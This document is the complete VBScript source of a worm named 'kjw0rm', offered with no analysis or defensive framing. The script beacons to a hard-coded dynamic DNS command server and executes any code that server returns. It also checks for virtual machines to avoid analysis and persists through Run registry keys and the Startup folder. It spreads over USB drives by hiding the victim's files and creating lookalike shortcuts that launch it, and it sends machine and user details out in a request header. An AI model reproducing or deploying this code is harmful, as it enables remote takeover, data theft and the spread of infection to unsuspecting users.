kjw0rm

1. 'MrLi0nHere
2. 'KJw0rm
3. 'Thanx njq8
4. On Error Resume Next
5. dim sh ' shell
6. set sh =WScript.CreateObject("WScript.Shell")
7. dim fs ' filesystem
8. set fs= CreateObject("Scripting.FileSystemObject")
9. dim dotnet
10. dotnet="No"
11. if fs.fileexists(sh.ExpandEnvironmentStrings("%windir%") & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe") then
12. dotnet="Yes"
13. end if
14. vmcheck
15. dim host
16. host= "windowshelp1234.duckdns.org"
17. dim port
18. port=33256
19. dim DR
20. DR = sh.ExpandEnvironmentStrings("%TEMP%") & "\"
21. dim FN
22. FN ="System.vbs"
23. dim fh
24. dim us
25. us="~"
26. ins
27. dim spl
28. spl="KsKsK"
29. dim i
30. i=0
31. while true
32. dim a
33. a= split(post("ready",""),spl)
34. select case a(0)
35. case "exc"
36. dim sa
37. sa= a(1)
38. execute sa
39. case "uns"
40. uns ""
41. end select
42. wscript.sleep 4000
43. i = i + 1
44. if i> 2 then
45. i=0
46. xins
47. end if
48. wend
49. function vmcheck()
50. On Error Resume Next
51. Set WMI = GetObject("WinMgmts:")
52. Set Col = WMI.ExecQuery("Select * from Win32_ComputerSystemProduct")
53. For Each Ob in Col
54. if instr( lcase( ob.name),"virtual") >0 then
55. On Error Resume Next
56. fs.deletefile(wscript.scriptfullname)
57. do
58. wscript.sleep(1000)
59. loop
60. end if
61. next
62. end Function
63. function ins
64. on error resume next
65. us= sh.regread("HKCU\KJ")
66. if us="~" then
67. if lcase( mid(wscript.scriptfullname,2))=":\" & lcase(fn) then
68. us="Yes"
69. sh.regwrite "HKCU\KJ", us, "REG_SZ"
70. else
71. us="No"
72. sh.regwrite "HKCU\KJ", us, "REG_SZ"
73. end if
74. end if
75. Err.Clear
76. fs.CopyFile wscript.scriptfullname,dr & fn ,true
77. set fh = fs.OpenTextFile( dr & fn, 8, false)
78. if Err.Number>0 then
79. wscript.quit
80. end if
81. xins
82. end function
83. sub xins
84. on error resume next
85. sh.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr & fn & chrw(34), "REG_SZ"
86. sh.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr & fn & chrw(34), "REG_SZ"
87. fs.copyfile wscript.scriptfullname, CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
88. for each xx in fs.Drives
89. if xx.isready then
90. if xx.FreeSpace >0 then
91. if xx.drivetype=1 then
92. if fs.fileexists(xx.path & "\" & fn) then
93. fs.getfile(xx.path & "\" & fn).Attributes=0
94. end if
95. fs.copyfile dr & fn , xx.path & "\" & fn,true
96. dim mx
97. mx=0
98. for Each x In fs.GetFolder( xx.path & "\" ).Files
99. if mx=20 then
100. exit for
101. end if
102. wscript.sleep 1
103. if instr(x.name,".") Then
104. if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" Then
105. x.Attributes = 2
106. if ucase(x.name) <> ucase(fn) Then
107. mx =mx +1
108. With sh.CreateShortcut(xx.path & "\" & x.name & ".lnk")
109. .TargetPath = "cmd.exe"
110. .WorkingDirectory = ""
111. .WindowStyle=7
112. .Arguments = "/c start " & Replace(fn," ", ChrW(34) _
113. & " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " & exit"
114. .IconLocation = sh.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\" & sh.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
115. if instr( .iconlocation,",")=0 then
116. .iconlocation = .iconlocation &",0"
117. end if
118. .Save()
119. end with
120. end if
121. end if
122. end if
123. Next
124. mx=0
125. fs.CreateFolder(xx.path & "\Videos\" )
126. for Each x In fs.GetFolder( xx.path & "\" ).SubFolders
127. if mx=20 then
128. exit for
129. end if
130. wscript.sleep 1
131. x.Attributes = 2
132. mx =mx +1
133. With sh.CreateShortcut(xx.path & "\" & x.name & ".lnk")
134. .TargetPath = "cmd.exe"
135. .WorkingDirectory = ""
136. .WindowStyle=7
137. .Arguments = "/c start " & Replace(fn," ", ChrW(34)& " " & ChrW(34)) & "&start explorer /root,%CD%" & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & "& exit"
138. .IconLocation = "%windir%\system32\SHELL32.dll,3"
139. .Save()
140. end with
141. Next
142. end if
143. end if
144. end if
145. next
146. Err.Clear
147. end sub
148. function uns(ex)
149. on error resume Next
150. fi.close
151. fh.close
152. sh.RegDelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\" & FN
153. sh.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & FN
154. fs.DeleteFile dr & fn ,true
155. fs.DeleteFile CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & FN ,True
156. for each xx in fs.Drives
157. if xx.isready then
158. if xx.FreeSpace >0 then
159. For Each x In fs.GetFolder( xx.path & "\").Files
160. On Error Resume Next
161. if instr(x.name,".") then
162. if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
163. x.Attributes = 0
164. if ucase(x.name) <> ucase(fn) then
165. fs.deletefile(xx.path & "\" & x.name & ".lnk" )
166. else
167. fs.deletefile( xx.path & "\" & x.name )
168. end if
169. end if
170. end If
171. Next
172. For Each x In fs.GetFolder( xx.path & "\").SubFolders
173. On Error Resume Next
174. if fs.fileexists( xx.Path & "\" & x.Name &".lnk") then
175. fs.deletefile(xx.path & "\" & x.name & ".lnk" )
176. end if
177. x.Attributes = 0
178. Next
179. end if
180. end if
181. Next
182. Dim tout
183. tout=0
184. Do until w.readystate=4
185. wscript.sleep(1000)
186. tout =tout + 1
187. If tout=10 Then Exit do
188. Loop
189. if ex<>"" then
190. sh.Run "cmd.exe /c ping 0&start " & ex,0, false
191. end if
192. wscript.quit
193. end function
194. function post(cmd ,da)
195. post=""
196. Dim o
197. Set o = CreateObject("MSXML2.XMLHTTP")
198. o.open "POST","http://" & host & ":" & port &"/" & cmd, false
199. o.setRequestHeader "User-Agent:", inf
200. o.send da
201. post=o.responseText
202. end function
203. dim xinf
204. function inf
205. on error resume next
206. if xinf="" then
207. dim s
208. s="??"
209. s = hwd
210. inf = inf & s & "\"
211. s="??"
212. s= sh.ExpandEnvironmentStrings("%COMPUTERNAME%")
213. inf = inf & s & "\"
214. s="??"
215. s= sh.ExpandEnvironmentStrings("%USERNAME%")
216. inf = inf & s & "\"
217. s="??"
218. Set szxquzftjy = GetObject( "w" & chrw(cint(33+72)) & "n" & "m" & "g" & "m" & "t" & chrw(cint(124-9)) & ":" & chrw(cint(2.86046511627907 * 43)) & chrw(cint(105)) & chrw(cint(63+46)) & "p" & "e" & chrw(3534 / 31) & chrw(115) & chrw(2775 / 25) & "n" & chrw(87+10) & "t" & "i" & chrw(13+98) & "n" & chrw(76) & "e" & chrw(cint(93+25)) & "e" & chrw(3888 / 36) & "=" & "i" & "m" & "p" & chrw(101) & chrw(3876 / 34) & chrw(115) & "o" & "n" & "a" & chrw(cint(116)) & chrw(cint(101)) & chrw(32 * 3.90625) & chrw(cint(51-18)) & "\" & chrw(6+86) & "." & chrw(cint(71+21)) & chrw(72+42) & "o" & chrw(111) & chrw(116) & chrw(cint(92)) & chrw(17+82) & "i" & chrw(218 / 2) & chrw(139-21) & chrw(300 / 6) )
219. Set yyotvzirsq = szxquzftjy.ExecQuery ( "S" & "e" & chrw(cint(3 * 36)) & "e" & chrw(107-8) & "t" & chrw(cint(46+-14)) & "*" & chrw(cint(9+23)) & "f" & "r" & "o" & "m" & " " & "W" & chrw(2.28260869565217 * 46) & chrw(102+8) & chrw(2.04 * 25) & "2" & "_" & chrw(32+47) & chrw(112) & chrw(48 * 2.10416666666667) & "r" & "a" & chrw(117-1) & chrw(cint(105 / 1)) & chrw(cint(66+44)) & "g" & chrw(71+12) & chrw(cint(4+117)) & "s" & chrw(cint(116)) & "e" & chrw(1090 / 10) )
220. dim cstdspjgkz
221. For Each aaa in yyotvzirsq
222. jgduwnagqo= aaa.Caption & " " & chrw(82+1) & chrw(14+66) & aaa.ServicePackMajorVersion
223. cstdspjgkz= aaa.countrycode
224. exit for
225. Next
226. jgduwnagqo= replace(jgduwnagqo, chrw(31+46) & chrw(cint(109-4)) & "c" & "r" & "o" & "s" & "o" & chrw(cint(102)) & "t" ,"")
227. jgduwnagqo= replace(jgduwnagqo, "W" & chrw(cint(3150 / 30)) & chrw(cint(21 * 5.23809523809524)) & chrw(3700 / 37) & "o" & chrw(101+18) & "s" & chrw(32) , "W" & chrw(20+85) & "n" )
228. jgduwnagqo= Replace(jgduwnagqo, " " & chrw(21.75 * 4) & "i" & "n" , "W" & chrw(20+85) & "n" )
229. jgduwnagqo = jgduwnagqo & chrw(cint(73-41)) & "x" & GetObject( chrw(5950 / 50) & chrw(735 / 7) & "n" & chrw(30+79) & chrw(4.47826086956522 * 23) & "m" & "t" & "s" & chrw(cint(38+20)) & "r" & "o" & "o" & chrw(116) & "\" & "c" & "i" & "m" & "v" & "2" & ":" & "W" & chrw(210 / 2) & "n" & "3" & chrw(1800 / 36) & "_" & chrw(cint(10+70)) & "r" & "o" & chrw(27+72) & chrw(3030 / 30) & chrw(cint(49 * 2.3469387755102)) & chrw(115) & "o" & chrw(cint(124-10)) & "=" & chrw(cint(8+31)) & chrw(99) & chrw(112) & "u" & "0" & "'" ).AddressWidth
230. inf = inf & jgduwnagqo & "\" & cstdspjgkz &"\0.5X\" & dotnet & nf &"\" & us &"\" & HWD
231. xinf=inf
232. else
233. inf=xinf
234. end if
235. end function
236. function HWD
237. HWD="KJw0rm"
238. On Error Resume Next
239. Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
240. Set aa = a.ExecQuery("SELECT * FROM Win32_LogicalDisk")
241. For Each aaa In aa
242. if aaa.VolumeSerialNumber<>"" then
243. HWD= "KJw0rm_" & aaa.VolumeSerialNumber
244. exit for
245. end if
246. Next
247. end function
248. Function nf
249. On Error Resume next
250. Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
251. Dim aSub, sKey , v
252. oReg.EnumKey &H80000002,"SOFTWARE\Microsoft\.NETFramework\Policy", aSub
253. For Each sKey In aSub
254. If InStr(sKey,"v") > 0 Then
255. v = sKey
256. End if
257. Next
258. nf = v
259. End Function